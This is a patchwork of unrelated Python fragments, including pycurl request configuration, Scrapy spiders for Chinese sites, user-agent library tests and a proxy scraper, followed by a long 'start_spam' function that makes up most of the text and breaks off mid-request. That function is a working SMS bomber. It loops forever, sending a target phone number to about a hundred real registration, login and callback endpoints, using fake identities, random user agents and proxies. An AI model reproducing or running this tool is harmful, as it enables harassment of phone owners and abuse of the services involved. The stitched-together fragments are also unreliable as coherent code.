self.curl.setopt(pycurl.REFERER, str(grab.config["referer"])) if grab.config["proxy"]: self.curl.setopt(pycurl.PROXY, str(grab.config["proxy"])) else: self.curl.setopt(pycurl.PROXY, "") if grab.config["proxy_userpwd"]: self.curl.setopt(pycurl.PROXYUSERPWD, str(grab.config["proxy_userpwd"])) if grab.config["proxy_type"]: key = "PROXYTYPE_%s" % grab.config["proxy_type"].upper() self.curl.setopt(pycurl.PROXYTYPE, getattr(pycurl, key)) if grab.config["encoding"]: if "gzip" in grab.config["encoding"] and "zlib" not in pycurl.version: raise error.GrabMisuseError( "You can not use gzip encoding because " "pycurl was built without zlib support" ) self.curl.setopt(pycurl.ENCODING, grab.config["encoding"]) if grab.config["userpwd"]: self.curl.setopt(pycurl.USERPWD, str(grab.config["userpwd"])) if grab.config.get("interface") is not None: self.curl.setopt(pycurl.INTERFACE, grab.config["interface"]) if grab.config.get("reject_file_size") is not None: self.curl.setopt(pycurl.MAXFILESIZE, grab.config["reject_file_size"])
def get_html(url): sleep(1) headers = {'Accept': '*/*', 'User-Agent': generate_user_agent()} response = requests.get(url, headers=headers) return response.text
# -*- coding: utf-8 -*- from user_agent import generate_user_agent BOT_NAME = 'comentariosg1' SPIDER_MODULES = ['comentariosg1.spiders'] NEWSPIDER_MODULE = 'comentariosg1.spiders' USER_AGENT = generate_user_agent(device_type=['desktop']) # Obey robots.txt rules ROBOTSTXT_OBEY = True FEED_EXPORT_ENCODING = 'utf-8'
def test_mac_chrome(self): for x in range(100): ua = generate_user_agent(platform='mac', navigator='chrome') self.assertTrue(re.search(r'OS X \d+_\d+(_\d+\b|\b)', ua))
def process_config(self, grab): req = Request(data=None) try: request_url = normalize_url(grab.config['url']) except Exception as ex: raise error.GrabInvalidUrl(u'%s: %s' % (six.text_type(ex), grab.config['url'])) req.url = request_url method = grab.detect_request_method() req.method = make_str(method) req.config_body_maxsize = grab.config['body_maxsize'] req.config_nobody = grab.config['nobody'] req.timeout = grab.config['timeout'] req.connect_timeout = grab.config['connect_timeout'] extra_headers = {} # Body processing if grab.config['body_inmemory']: pass else: if not grab.config['body_storage_dir']: raise GrabMisuseError('Option body_storage_dir is not defined') file_, path_ = self.setup_body_file( grab.config['body_storage_dir'], grab.config['body_storage_filename'], create_dir=grab.config['body_storage_create_dir']) req.response_file = file_ req.response_path = path_ if grab.config['multipart_post'] is not None: post_data = grab.config['multipart_post'] if isinstance(post_data, six.binary_type): pass elif isinstance(post_data, six.text_type): raise GrabMisuseError('Option multipart_post data' ' does not accept unicode.') else: post_items = normalize_http_values( grab.config['multipart_post'], charset=grab.config['charset'], ignore_classes=(UploadFile, UploadContent), ) post_items = decode_pairs(post_items, grab.config['charset']) post_items = process_upload_items(post_items) post_data, content_type = encode_multipart_formdata(post_items) extra_headers['Content-Type'] = content_type extra_headers['Content-Length'] = len(post_data) req.data = post_data elif grab.config['post'] is not None: post_data = normalize_post_data(grab.config['post'], grab.config['charset']) # py3 hack # if six.PY3: # post_data = smart_unicode(post_data, # grab.config['charset']) extra_headers['Content-Length'] = len(post_data) req.data = post_data if method in ('POST', 'PUT'): if (grab.config['post'] is None and grab.config['multipart_post'] is None): raise GrabMisuseError('Neither `post` or `multipart_post`' ' options was specified for the %s' ' request' % method) # Proxy if grab.config['proxy']: req.proxy = grab.config['proxy'] if grab.config['proxy_userpwd']: req.proxy_userpwd = grab.config['proxy_userpwd'] if grab.config['proxy_type']: req.proxy_type = grab.config['proxy_type'] else: req.proxy_type = 'http' # User-Agent if grab.config['user_agent'] is None: if grab.config['user_agent_file'] is not None: with open(grab.config['user_agent_file']) as inf: lines = inf.read().splitlines() grab.config['user_agent'] = random.choice(lines) else: grab.config['user_agent'] = generate_user_agent() extra_headers['User-Agent'] = grab.config['user_agent'] # Headers headers = extra_headers headers.update(grab.config['common_headers']) if grab.config['headers']: headers.update(grab.config['headers']) req.headers = headers # Cookies self.process_cookie_options(grab, req) self._request = req
def test_navigator_option_tuple(self): for x in range(100): ua = generate_user_agent(navigator=('chrome', )) ua = generate_user_agent(navigator=('chrome', 'firefox')) ua = generate_user_agent(navigator=('chrome', 'firefox', 'ie'))
def infoParse(self, response): item = CfachinaItem() currentPage = response.meta['currentPage'] organid = response.meta['organid'] callbacks = response.meta['callbacks'] selectType = response.meta['selectType'] #第一页时,获取全局totalPage if currentPage == 1: totalPage = response.xpath( '//li[text()="共["]/span/text()').extract_first() totalPage = int( totalPage) if totalPage and totalPage.isdigit() else None #非第一页时,从meta里获取全局totalPage else: totalPage = response.meta['totalPage'] configs = Con.main(response.url) if configs['list']['v'] is not '': res = S.select_content(response, configs['list']) else: res = [response] #res可能为None,若非None,则parse数据 if res is not None: for info in res: result = dict() for config in configs['data']: k = config['En'] result[k] = S.select_content(info, config) result[k] = S.replace_all(result[k]) # print(result) item['result'] = result item['keys'] = configs['list']['keys'] item['db'] = configs['list']['db'] yield item #根据类和totalPage判断是否还有下一页,有就继续request nextpage if isinstance(totalPage, int) and currentPage < totalPage / 20: currentPage += 1 data = { 'organid': organid, 'currentPage': str(currentPage), 'pageSize': '20', 'selectType': selectType } url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode( data) yield scrapy.Request( url, callback=eval(callbacks), headers={ 'User-Agent': generate_user_agent(os=('win', 'mac', 'linux')) }, meta={ 'currentPage': currentPage, 'totalPage': totalPage, 'organid': organid, 'callbacks': callbacks, 'selectType': selectType }, )
def random_user_agent(): global header header['User-Agent'] = generate_user_agent()
def cdfQualificationListparse(self, response): """从业资格信息""" # '''保存为本地html''' # print(response.text) # with open("1.html","wb") as f: # f.write(response.body) if self.page == 1: self.cdfQualificationListTotalPages = int( response.xpath('//ul[@class="yema"]/li[last()]/span/text()'). extract_first()) currentPage = 1 for info in response.xpath( '//td[text()=" 机构编号 "]/parent::tr/following-sibling::tr'): #获取机构编号,构造九表url organid = info.xpath('td[1]/text()').extract_first() #构造url #资管业务--暂时未写逻辑 # data_ = {'organid':organid} # yield scrapy.Request('http://www.cfachina.org/cfainfo/personOfAssetmanageinfoServlet?'+urllib.parse.urlencode(data_), # meta = {'organid':organid}, # callback = self.infoParse1, # headers = {'User-Agent':generate_user_agent(os=('win','mac','linux'))} # ) for selecttype in [{ 't': 'organbaseinfo', 'callback': 'self.infoParse' }, { 't': 'organhisinfo', 'callback': 'self.infoParse' }, { 't': 'organbranchinfo', 'callback': 'self.infoParse' }, { 't': 'supervisorinfo', 'callback': 'self.infoParse' }, { 't': 'personinfo', 'callback': 'self.infoParse' }, { 't': 'organshareholderinfo', 'callback': 'self.infoParse' }, { 't': 'organcreditinfo', 'callback': 'self.infoParse' }, { 't': 'organfinancialinfo', 'callback': 'self.infoParse' }, { 't': 'subdebtmonthinfo', 'callback': 'self.infoParse' }]: #urlencode生成method:get url data = { 'organid': organid, 'currentPage': str(currentPage), 'pageSize': '20', 'selectType': selecttype['t'] } url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode( data) callbacks = selecttype['callback'] selectType = selecttype['t'] #发送url request yield scrapy.Request(url, meta={ 'currentPage': currentPage, 'organid': organid, 'callbacks': callbacks, 'selectType': selectType }, callback=eval(callbacks), headers={ 'User-Agent': generate_user_agent(os=('win', 'mac', 'linux')) }) if self.page < self.cdfQualificationListTotalPages: self.page += 1 nextdata = self.madedata(self.page) nextheaders = {'User-Agent': generate_user_agent()} nexturl = 'http://www.cfachina.org/cfainfo/organbaseinfoServlet' yield scrapy.FormRequest(nexturl, method='POST', formdata=nextdata, headers=nextheaders, callback=self.cdfQualificationListparse)
import json import os import re import time from multiprocessing import Lock, Pool, Process, RLock import requests import user_agent from requests.exceptions import RequestException filename = 'result.txt' file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), filename) headers = {'user-agent': user_agent.generate_user_agent()} def get_one_page(url): try: resp = requests.get(url, headers=headers) if resp.status_code == 200: print("Download-Success {}".format(url)) return resp.text return None except RequestException: print("Download-Failed {}".format(url)) return None def parse_one_page(html): pattern = re.compile( '<dd>.*?board-index.*?>(\d+)</i>.*?' + 'data-src="(.*?)".*?' +
import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))) sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))) from SpiderHelp import SpiderHelp from RedisHelp import _Request,_RedisSpider,logger conn_flag = False REDISFLAG = True TODAY = time.strftime('%Y-%m-%d') Headers = {'User-Agent': generate_user_agent(os=('win',))} Cookies = {'.ASPXANONYMOUS':'pdtC5gfC0wEkAAAAOWIzZDNiMGEtYjUzOS00YzYyLWEyZTctNWM2OTdmOGM2ZDcz0'} MAX = 2**15 def get_area(): res = requests.get('http://js.51jobcdn.com/in/js/2016/layer/area_array_c.js?20171103') RESULT = json.loads(re.compile('area=(\{.*?\})',re.S).search(res.text).group(1)) return RESULT class SinaspiderSpider(_RedisSpider, SpiderHelp): #,scrapy.Spider name = '51job_test' start_urls = get_area() state = {}
import json import logging import time from datetime import datetime as dt from typing import Set import brotli import requests from bs4 import BeautifulSoup from user_agent import generate_user_agent from .tools.proxies_manipulation import parse_proxies, short_url logger = logging.getLogger(__name__) standard_headers = {"User-Agent": generate_user_agent()} timeout = 6 def proxy50_50() -> Set[str]: url = "https://proxy50-50.blogspot.com/" proxies_set = set() try: r = requests.get(url, headers=standard_headers, timeout=timeout) proxies_set.update(parse_proxies(r.text)) logger.info( f"From {short_url(r.url)} were parsed {len(proxies_set)} proxies") except Exception: logger.exception(f"Proxies from {short_url(url)} were not loaded :(") return proxies_set
def start_spam(phone): def format_phone(phone, phone_mask): phone_list = list(phone) for i in phone_list: phone_mask = phone_mask.replace("#", i, 1) return phone_mask name = "" for _ in range(12): name = name + choice( "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") password = name + choice( "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") email = name + "@gmail.com" phone9 = phone[1:] headers = {"User-Agent": generate_user_agent()} proxies = generate_proxy() while True: try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://zoloto585.ru/api/bcard/reg/", json={ "name": "", "surname": "", "patronymic": "", "sex": "m", "birthdate": "..", "phone": formatted_phone, "email": "", "city": "" }, headers=headers) except: pass try: formatted_phone = format_phone(phone[1:], "8(###)###-##-##") post( "http://xn---72-5cdaa0cclp5fkp4ewc.xn--p1ai/user_account/ajax222.php?do=sms_code", data={"phone": formatted_phone}, headers=headers) except: pass try: post("https://youla.ru/web-api/auth/request_code", data={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://yaponchik.net/login/login.php", data={ "login": "******", "countdown": "0", "step": "phone", "redirect": "/profile/", "phone": formatted_phone, "code": "" }, headers=headers) except: pass try: post("https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": "+" + phone}, headers=headers) except: pass try: post("https://api.iconjob.co/api/auth/verification_code", json={"phone": phone}, headers=headers) except: pass try: post("https://cabinet.wi-fi.ru/api/auth/by-sms", data={"msisdn": phone}, headers=headers) except: pass try: post("https://ng-api.webbankir.com/user/v2/create", json={ "lastName": "иванов", "firstName": "иван", "middleName": "иванович", "mobilePhone": phone, "email": email, "smsCode": "" }, headers=headers) except: pass try: post("https://shop.vsk.ru/ajax/auth/postSms/", data={"phone": phone}, headers=headers) except: pass try: post("https://passport.twitch.tv/register?trusted_request=true", json={ "birthday": { "day": 11, "month": 11, "year": 1999 }, "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True, "password": password, "phone_number": phone, "username": name }, headers=headers) except: pass try: post("https://b.utair.ru/api/v1/login/", json={ "login": phone, "confirmation_type": "call_code" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "#(###)###-##-##") post("https://www.r-ulybka.ru/login/form_ajax.php", data={ "action": "auth", "phone": formatted_phone }, headers=headers) except: pass try: post("https://uklon.com.ua/api/v1/account/code/send", headers={ "client_id": "6289de851fc726f887af8d5d7a56c635", "User-Agent": generate_user_agent() }, json={"phone": phone}) except: pass try: post("https://partner.uklon.com.ua/api/v1/registration/sendcode", headers={ "client_id": "6289de851fc726f887af8d5d7a56c635", "User-Agent": generate_user_agent() }, json={"phone": phone}) except: pass try: post("https://secure.ubki.ua/b2_api_xml/ubki/auth", json={ "doc": { "auth": { "mphone": "+" + phone, "bdate": "11.11.1999", "deviceid": "00100", "version": "1.0", "source": "site", "signature": "undefined" } } }, headers={ "Accept": "application/json", "User-Agent": generate_user_agent() }) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://www.top-shop.ru/login/loginByPhone/", data={"phone": formatted_phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "8(###)###-##-##") post("https://topbladebar.ru/user_account/ajax222.php?do=sms_code", data={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru", data={"phone_number": phone}, headers=headers) except: pass try: post("https://m.tiktok.com/node-a/send/download_link", json={ "slideVerify": 0, "language": "ru", "PhoneRegionCode": "7", "Mobile": phone9, "page": { "pageName": "home", "launchMode": "direct", "trafficType": "" } }, headers=headers) except: pass try: post("https://thehive.pro/auth/signup", json={"phone": "+" + phone}, headers=headers) except: pass try: post(f"https://msk.tele2.ru/api/validation/number/{phone}", json={"sender": "Tele2"}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ### - ## - ##") post("https://www.taxi-ritm.ru/ajax/ppp/ppp_back_call.php", data={ "RECALL": "Y", "BACK_CALL_PHONE": formatted_phone }, headers=headers) except: pass try: post("https://www.tarantino-family.com/wp-admin/admin-ajax.php", data={ "action": "callback_phonenumber", "phone": phone }, headers=headers) except: pass try: post("https://lk.tabris.ru/reg/", data={ "action": "phone", "phone": phone }, headers=headers) except: pass try: post("https://tabasko.su/", data={ "IS_AJAX": "Y", "COMPONENT_NAME": "AUTH", "ACTION": "GET_CODE", "LOGIN": phone }, headers=headers) except: pass try: post("https://www.sushi-profi.ru/api/order/order-call/", json={ "phone": phone9, "name": name }, headers=headers) except: pass try: post("https://client-api.sushi-master.ru/api/v1/auth/init", json={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8(###)###-##-##") post( "https://xn--80aaispoxqe9b.xn--p1ai/user_account/ajax.php?do=sms_code", data={"phone": formatted_phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8 (###) ###-##-##") post("http://sushigourmet.ru/auth", data={ "phone": formatted_phone, "stage": 1 }, headers=headers) except: pass try: post("https://sushifuji.ru/sms_send_ajax.php", data={ "name": "false", "phone": phone }, headers=headers) except: pass try: post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": phone}, headers=headers) except: pass try: get("https://suandshi.ru/mobile_api/register_mobile_user", params={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8-###-###-##-##") post("https://pizzasushiwok.ru/index.php", data={ "mod_name": "registration", "tpl": "restore_password", "phone": formatted_phone }, headers=headers) except: pass try: get("https://www.sportmaster.ua/", params={ "module": "users", "action": "SendSMSReg", "phone": phone }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") get("https://www.sportmaster.ru/user/session/sendSmsCode.do", params={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php", data={ "demo_number": "+" + phone, "ajax_demo_send": "1" }, headers=headers) except: pass try: post("https://smart.space/api/users/request_confirmation_code/", json={ "mobile": "+" + phone, "action": "confirm_mobile" }, headers=headers) except: pass try: post("https://shopandshow.ru/sms/password-request/", data={ "phone": "+" + phone, "resend": 0 }, headers=headers) except: pass try: post( "https://shafa.ua/api/v3/graphiql", json={ "operationName": "RegistrationSendSms", "variables": { "phoneNumber": "+" + phone }, "query": "mutation RegistrationSendSms($phoneNumber: String!) {\n unauthorizedSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n field\n messages {\n message\n code\n __typename\n }\n __typename\n }\n __typename\n }\n}\n" }, headers=headers) except: pass try: post( "https://shafa.ua/api/v3/graphiql", json={ "operationName": "sendResetPasswordSms", "variables": { "phoneNumber": "+" + phone }, "query": "mutation sendResetPasswordSms($phoneNumber: String!) {\n resetPasswordSendSms(phoneNumber: $phoneNumber) {\n isSuccess\n userToken\n errors {\n ...errorsData\n __typename\n }\n __typename\n }\n}\n\nfragment errorsData on GraphResponseError {\n field\n messages {\n code\n message\n __typename\n }\n __typename\n}\n" }, headers=headers) except: pass try: post("https://sayoris.ru/?route=parse/whats", data={"phone": phone}, headers=headers) except: pass try: post("https://api.saurisushi.ru/Sauri/api/v2/auth/login", data={ "data": { "login": phone9, "check": True, "crypto": { "captcha": "739699" } } }, headers=headers) except: pass try: post("https://pass.rutube.ru/api/accounts/phone/send-password/", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://rutaxi.ru/ajax_auth.html", data={ "l": phone9, "c": "3" }, headers=headers) except: pass try: post("https://rieltor.ua/api/users/register-sms/", json={ "phone": phone, "retry": 0 }, headers=headers) except: pass try: post( "https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php", data={"phone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+#(###)###-##-##") post("https://www.rendez-vous.ru/ajax/SendPhoneConfirmationNew/", data={ "phone": formatted_phone, "alien": "0" }, headers=headers) except: pass try: get("https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code", params={"number": phone}, headers=headers) except: pass try: post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code", json={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+#-###-###-##-##") post("https://api.pozichka.ua/v1/registration/send", json={"RegisterSendForm": { "phone": formatted_phone }}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post( "https://pliskov.ru/Cube.MoneyRent.Orchard.RentRequest/PhoneConfirmation/SendCode", data={"phone": formatted_phone}, headers=headers) except: pass try: get("https://cabinet.planetakino.ua/service/sms", params={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8-###-###-##-##") post("https://pizzasushiwok.ru/index.php", data={ "mod_name": "call_me", "task": "request_call", "name": name, "phone": formatted_phone }, headers=headers) except: pass try: post("https://pizzasinizza.ru/api/phoneCode.php", json={"phone": phone9}, headers=headers) except: pass try: post("https://pizzakazan.com/auth/ajax.php", data={ "phone": "+" + phone, "method": "sendCode" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-####") post("https://pizza46.ru/ajaxGet.php", data={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://piroginomerodin.ru/index.php?route=sms/login/sendreg", data={"telephone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+#-###-###-##-##") post("https://paylate.ru/registry", data={ "mobile": formatted_phone, "first_name": name, "last_name": name, "nick_name": name, "gender-client": 1, "email": email, "action": "registry" }, headers=headers) except: pass try: post( "https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode", data={"telephone": "8" + phone9}, headers=headers) except: pass try: post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry", json={ "phone": phone, "otpId": 0 }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-####") post("https://www.osaka161.ru/local/tools/webstroy.webservice.php", data={ "name": "Auth.SendPassword", "params[0]": formatted_phone }, headers=headers) except: pass try: post("https://ontaxi.com.ua/api/v2/web/client", json={ "country": "UA", "phone": phone[3:] }, headers=headers) except: pass try: get("https://secure.online.ua/ajax/check_phone/", params={"reg_phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "8 (###) ###-##-##") get("https://okeansushi.ru/includes/contact.php", params={ "call_mail": "1", "ajax": "1", "name": name, "phone": formatted_phone, "call_time": "1", "pravila2": "on" }, headers=headers) except: pass try: post( "https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data={"st.r.phone": "+" + phone}, headers=headers) except: pass try: post("https://nn-card.ru/api/1.0/covid/login", json={"phone": phone}, headers=headers) except: pass try: post("https://www.nl.ua", data={ "component": "bxmaker.authuserphone.login", "sessid": "bf70db951f54b837748f69b75a61deb4", "method": "sendCode", "phone": phone, "registration": "N" }, headers=headers) except: pass try: post("https://www.niyama.ru/ajax/sendSMS.php", data={ "REGISTER[PERSONAL_PHONE]": phone, "code": "", "sendsms": "Выслать код" }, headers=headers) except: pass try: post("https://account.my.games/signup_send_sms/", data={"phone": phone}, headers=headers) except: pass try: post("https://auth.multiplex.ua/login", json={"login": phone}, headers=headers) except: pass try: post( "https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code", params={"msisdn": phone}, headers=headers) except: pass try: post("https://www.moyo.ua/identity/registration", data={ "firstname": name, "phone": phone, "email": email }, headers=headers) except: pass try: post( "https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php", data={ "name": name, "phone": phone }, headers=headers) except: pass try: post("https://www.monobank.com.ua/api/mobapplink/send", data={"phone": "+" + phone}, headers=headers) except: pass try: post( "https://moneyman.ru/registration_api/actions/send-confirmation-code", data="+" + phone, headers=headers) except: pass try: post("https://my.modulbank.ru/api/v2/registration/nameAndPhone", json={ "FirstName": name, "CellPhone": phone, "Package": "optimal" }, headers=headers) except: pass try: post("https://mobileplanet.ua/register", data={ "klient_name": name, "klient_phone": "+" + phone, "klient_email": email }, headers=headers) except: pass try: get("https://my.mistercash.ua/ru/send/sms/registration", params={"number": "+" + phone}, headers=headers) except: pass try: get("https://menza-cafe.ru/system/call_me.php", params={ "fio": name, "phone": phone, "phone_number": "1" }, headers=headers) except: pass try: post( "https://www.menu.ua/kiev/delivery/registration/direct-registration.html", data={ "user_info[fullname]": name, "user_info[phone]": phone, "user_info[email]": email, "user_info[password]": password, "user_info[conf_password]": password }, headers=headers) except: pass try: post("https://www.menu.ua/kiev/delivery/profile/show-verify.html", data={ "phone": phone, "do": "phone" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# ### ### ## ##") get("https://makimaki.ru/system/callback.php", params={ "cb_fio": name, "cb_phone": formatted_phone }, headers=headers) except: pass try: post( "https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php", data={ "data": phone, "metod": "postreg" }, headers=headers) except: pass try: post( "https://api-rest.logistictech.ru/api/v1.1/clients/request-code", json={"phone": phone}, headers={ "Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9", "User-Agent": generate_user_agent() }) except: pass try: post("https://loany.com.ua/funct/ajax/registration/code", data={"phone": phone}, headers=headers) except: pass try: post( "https://lenta.com/api/v1/authentication/requestValidationCode", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://koronapay.com/transfers/online/api/users/otps", data={"phone": phone}, headers=headers) except: pass try: post("https://api.kinoland.com.ua/api/v1/service/send-sms", headers={ "Agent": "website", "User-Agent": generate_user_agent() }, json={ "Phone": phone, "Type": 1 }) except: pass try: formatted_phone = format_phone(phone, "# (###) ###-##-##") post("https://kilovkusa.ru/ajax.php", params={ "block": "auth", "action": "send_register_sms_code", "data_type": "json" }, data={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://kaspi.kz/util/send-app-link", data={"address": phone9}, headers=headers) except: pass try: post("https://app.karusel.ru/api/v1/phone/", data={"phone": phone}, headers=headers) except: pass try: post("https://izi.ua/api/auth/register", json={ "phone": "+" + phone, "name": name, "is_terms_accepted": True }, headers=headers) except: pass try: post("https://izi.ua/api/auth/sms-login", json={"phone": "+" + phone}, headers=headers) except: pass try: post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+## (###) ###-##-##") post("https://iqlab.com.ua/session/ajaxregister", data={"cellphone": formatted_phone}, headers=headers) except: pass try: post("https://www.ingos.ru/api/v1/lk/auth/register/fast/step2", headers={ "Referer": "https://www.ingos.ru/cabinet/registration/personal", "User-Agent": generate_user_agent() }, json={ "Birthday": "1986-07-10T07:19:56.276+02:00", "DocIssueDate": "2004-02-05T07:19:56.276+02:00", "DocNumber": randint(500000, 999999), "DocSeries": randint(5000, 9999), "FirstName": name, "Gender": "M", "LastName": name, "SecondName": name, "Phone": phone9, "Email": email }) except: pass try: post("https://terra-1.indriverapp.com/api/authorization?locale=ru", data={ "mode": "request", "phone": "+" + phone, "phone_permission": "unknown", "stream_id": 0, "v": 3, "appversion": "3.20.6", "osversion": "unknown", "devicemodel": "unknown" }, headers=headers) except: pass try: post("https://api.imgur.com/account/v1/phones/verify", json={ "phone_number": phone, "region_code": "RU" }, headers=headers) except: pass try: post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={ "msisdn": phone, "locale": "en", "countryCode": "ru", "version": "1", "k": "ic1rtwz1s1Hj1O0r", "r": "46763" }, headers=headers) except: pass try: get("https://api.hmara.tv/stable/entrance", params={"contact": phone}, headers=headers) except: pass try: post("https://helsi.me/api/healthy/accounts/login", json={ "phone": phone, "platform": "PISWeb" }, headers=headers) except: pass try: post("https://www.hatimaki.ru/register/", data={ "REGISTER[LOGIN]": phone, "REGISTER[PERSONAL_PHONE]": phone, "REGISTER[SMS_CODE]": "", "resend-sms": "1", "REGISTER[EMAIL]": "", "register_submit_button": "Зарегистрироваться" }, headers=headers) except: pass try: post("https://guru.taxi/api/v1/driver/session/verify", json={"phone": { "code": 1, "number": phone9 }}, headers=headers) except: pass try: post("https://crm.getmancar.com.ua/api/veryfyaccount", json={ "phone": "+" + phone, "grant_type": "password", "client_id": "gcarAppMob", "client_secret": "SomeRandomCharsAndNumbersMobile" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://foodband.ru/api?call=calls", data={ "customerName": name, "phone": formatted_phone, "g-recaptcha-response": "" }, headers=headers) except: pass try: get("https://foodband.ru/api/", params={ "call": "customers/sendVerificationCode", "phone": phone9, "g-recaptcha-response": "" }, headers=headers) except: pass try: post("https://www.flipkart.com/api/5/user/otp/generate", headers={ "Origin": "https://www.flipkart.com", "User-Agent": generate_user_agent() }, data={"loginId": "+" + phone}) except: pass try: post("https://www.flipkart.com/api/6/user/signup/status", headers={ "Origin": "https://www.flipkart.com", "User-Agent": generate_user_agent() }, json={ "loginId": "+" + phone, "supportAllStates": True }) except: pass try: post("https://fix-price.ru/ajax/register_phone_code.php", data={ "register_call": "Y", "action": "getCode", "phone": "+" + phone }, headers=headers) except: pass try: get("https://findclone.ru/register", params={"phone": "+" + phone}, headers=headers) except: pass try: post("https://www.finam.ru/api/smslocker/sendcode", data={"phone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://2407.smartomato.ru/account/session", json={ "phone": formatted_phone, "g-recaptcha-response": None }, headers=headers) except: pass try: post("https://www.etm.ru/cat/runprog.html", data={ "m_phone": phone9, "mode": "sendSms", "syf_prog": "clients-services", "getSysParam": "yes" }, headers=headers) except: pass try: get("https://api.eldorado.ua/v1/sign/", params={ "login": phone, "step": "phone-check", "fb_id": "null", "fb_token": "null", "lang": "ru" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+## (###) ###-##-##") post("https://e-groshi.com/online/reg", data={ "first_name": name, "last_name": name, "third_name": name, "phone": formatted_phone, "password": password, "password2": password }, headers=headers) except: pass try: post("https://vladimir.edostav.ru/site/CheckAuthLogin", data={"phone_or_email": "+" + phone}, headers=headers) except: pass try: post("https://api.easypay.ua/api/auth/register", json={ "phone": phone, "password": password }, headers=headers) except: pass try: post("https://my.dianet.com.ua/send_sms/", data={"phone": phone}, headers=headers) except: pass try: post("https://api.delitime.ru/api/v2/signup", data={ "SignupForm[username]": phone, "SignupForm[device_type]": 3 }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://api.creditter.ru/confirm/sms/send", json={ "phone": formatted_phone, "type": "register" }, headers=headers) except: pass try: post("https://clients.cleversite.ru/callback/run.php", data={ "siteid": "62731", "num": phone, "title": "Онлайн-консультант", "referrer": "https://m.cleversite.ru/call" }, headers=headers) except: pass try: post("https://city24.ua/personalaccount/account/registration", data={"PhoneNumber": phone}, headers=headers) except: pass try: post( f"https://www.citilink.ru/registration/confirm/phone/+{phone}/", headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://cinema5.ru/api/phone_code", data={"phone": formatted_phone}, headers=headers) except: pass try: post("https://api.cian.ru/sms/v1/send-validation-code/", json={ "phone": "+" + phone, "type": "authenticateCode" }, headers=headers) except: pass try: post( "https://api.carsmile.com/", son={ "operationName": "enterPhone", "variables": { "phone": phone }, "query": "mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n" }, headers=headers) except: pass try: get("https://it.buzzolls.ru:9995/api/v2/auth/register", params={"phoneNumber": "+" + phone}, headers={ "keywordapi": "ProjectVApiKeyword", "usedapiversion": "3", "User-Agent": generate_user_agent() }) except: pass try: formatted_phone = format_phone(phone9, "(###)###-##-##") post("https://bluefin.moscow/auth/register/", data={ "phone": formatted_phone, "sendphone": "Далее" }, headers=headers) except: pass try: post("https://app.benzuber.ru/login", data={"phone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://bartokyo.ru/ajax/login.php", data={"user_phone": 